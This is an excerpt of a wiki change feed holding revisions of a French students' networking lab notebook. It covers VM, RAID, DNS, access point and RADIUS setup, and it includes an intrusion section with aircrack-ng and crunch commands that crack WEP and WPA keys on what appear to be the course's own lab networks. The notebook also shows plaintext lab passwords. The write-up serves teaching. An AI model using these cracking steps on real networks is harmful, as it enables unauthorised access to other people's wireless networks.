 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60272</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60272"/>
				<updated>2022-11-28T23:42:58Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Configuration du serveur RADIUS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
